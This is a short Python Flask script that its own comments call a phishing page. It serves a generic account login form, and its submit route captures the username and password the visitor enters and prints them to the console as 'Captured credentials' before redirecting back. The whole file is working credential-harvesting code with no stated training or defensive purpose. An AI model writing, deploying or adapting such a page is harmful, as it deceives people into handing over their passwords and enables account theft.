

from flask import Flask, request, render_template_string, redirect, url_for

app = Flask(__name__)

# HTML template for phishing page
phishing_page = '''
<!doctype html>
<html>
<head><title>Login Page</title></head>
<body>
    <h2>Login to Your Account</h2>
    <form action="/submit" method="post">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username"><br><br>
        <label for="password">Password:</label>
        <input type="password" id="password" name="password"><br><br>
        <input type="submit" value="Login">
    </form>
</body>
</html>
'''

@app.route('/')
def index():
    return render_template_string(phishing_page)

@app.route('/submit', methods=['POST'])
def submit():
    username = request.form.get('username')
    password = request.form.get('password')
    # Print captured credentials to the console
    print(f"Captured credentials: Username: {username}, Password: {password}")
    return redirect(url_for('index'))

if __name__ == '__main__':
    app.run(port=5000, debug=True)
